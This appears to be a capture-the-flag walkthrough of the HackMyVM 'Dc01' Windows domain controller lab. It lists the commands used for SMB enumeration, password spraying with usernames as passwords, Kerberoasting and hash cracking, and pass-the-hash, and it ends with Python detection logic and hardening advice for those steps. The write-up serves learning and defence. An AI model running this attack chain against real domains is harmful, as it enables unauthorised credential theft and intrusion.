# Dc01

November 17, 2024

Created by: josemlwdf
Page: HackMyVm
Difficulty: Easy
OS: Windows

I start with a scan of the open ports:

```
nmap -p- --open --min-rate 5000 -sS -Pn 10.0.2.4 -oG scan
```

I continue with a scan of the versions and technologies running on the open ports that were found:

```
nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49671,49686 -sCV -Pn 10.0.2.4 -oN ports
```

I list the resources shared over SMB:

```
smbmap -H 10.0.2.4 -u 'guest'
```

Seeing that I have read permissions on IPC$, I can enumerate domain users. Once I have a list of potential users I run it through crackmapexec to validate them:

```
impacket-lookupsid SOUPEDECODE@10.0.2.4 -no-pass
crackmapexec smb 10.0.2.4 -u users -p "" --shares --continue-on-success
```

I check for users whose password is the same as their own username, and I find the user ybob317:

```
netexec smb 10.0.2.4 -u users_potencial -p users_potencial --no-bruteforce --continue-on-success | grep -v "[-]"
```

With the credentials found I list the SMB resources again; I can now see new folders, and inside them I find the first flag:

```
smbmap -H 10.0.2.4 -u 'ybob317' -p 'ybob317'
```

I check if this user has permissions to connect via RDP:

```
crackmapexec winrm 10.0.2.4 -u "ybob317" -p "ybob317"
```

I try to get user hashes through an ASREPRoast. Without providing credentials I get nothing, but using ybob317's credentials I manage to dump several hashes. I notice an error caused by the time difference between the machine and my computer, so I adjust it with ntpdate:

```
ntpdate 10.0.2.4
impacket-GetUserSPNs -request -dc-ip 10.0.2.4 SOUPEDECODE.LOCAL/ybob317:ybob317 -outputfile hashes.kerberoast
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.kerberoast
```

With these new credentials I can view the contents of a new folder, and I get a file containing the hashes of several users.

I check whether the hashes found belong to any user and whether I can do pass-the-hash (PtH). I find a user with whom this attack works; when the output shows Pwn3d! it tells me that I can connect to the machine. When I log in I see that I have enough permissions to read the second flag:

```
netexec smb 10.0.2.4 -u a -p hahses --continue-on-success
```
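From the defender's side, the two noisiest steps above (the username-as-password spray and the Kerberoast ticket requests) leave distinctive traces in the domain controller's Security log. The following is an added example, not part of this writeup, that applies simple detection logic to constructed Event ID 4625 and 4769 records; the source IP 10.0.2.15, the service name svc_sql and all usernames other than ybob317 are made up for the sample.

```python
from collections import defaultdict

# Constructed sample Security-log records (not captured from the lab machine).
# Field names mirror what a SIEM typically extracts from Event IDs 4625 and 4769.
EVENTS = [
    {"id": 4625, "src": "10.0.2.15", "user": "ybob317", "minute": 1},
    {"id": 4625, "src": "10.0.2.15", "user": "jdoe", "minute": 1},
    {"id": 4625, "src": "10.0.2.15", "user": "asmith", "minute": 2},
    {"id": 4625, "src": "10.0.2.15", "user": "mlee", "minute": 2},
    {"id": 4625, "src": "10.0.2.15", "user": "kwong", "minute": 3},
    {"id": 4625, "src": "10.0.2.20", "user": "admin", "minute": 1},
    {"id": 4769, "src": "10.0.2.15", "user": "ybob317", "service": "svc_sql", "etype": "0x17"},
    {"id": 4769, "src": "10.0.2.15", "user": "ybob317", "service": "DC01$", "etype": "0x12"},
    {"id": 4769, "src": "10.0.2.15", "user": "ybob317", "service": "krbtgt", "etype": "0x12"},
]


def spray_sources(events, min_users=5, window=5):
    """Source IPs with failed logons (4625) for >= min_users distinct accounts
    inside any `window`-minute span: the signature of a password spray."""
    by_src = defaultdict(list)
    for e in events:
        if e["id"] == 4625:
            by_src[e["src"]].append((e["minute"], e["user"]))
    hits = set()
    for src, attempts in by_src.items():
        attempts.sort()
        for i, (start, _) in enumerate(attempts):
            users = {u for m, u in attempts[i:] if m - start <= window}
            if len(users) >= min_users:
                hits.add(src)
                break
    return hits


def kerberoast_requests(events):
    """(requester, service) pairs for service-ticket requests (4769) that used
    RC4 (etype 0x17) against a non-machine, non-krbtgt account: the pattern a
    tool like GetUserSPNs -request produces when it asks for crackable tickets."""
    return [
        (e["user"], e["service"])
        for e in events
        if e["id"] == 4769
        and e["etype"] == "0x17"
        and not e["service"].endswith("$")
        and e["service"].lower() != "krbtgt"
    ]
```

In a real deployment the thresholds belong in the SIEM rule, and enforcing AES-only Kerberos on service accounts plus long random service-account passwords removes most of the value of the Kerberoast step.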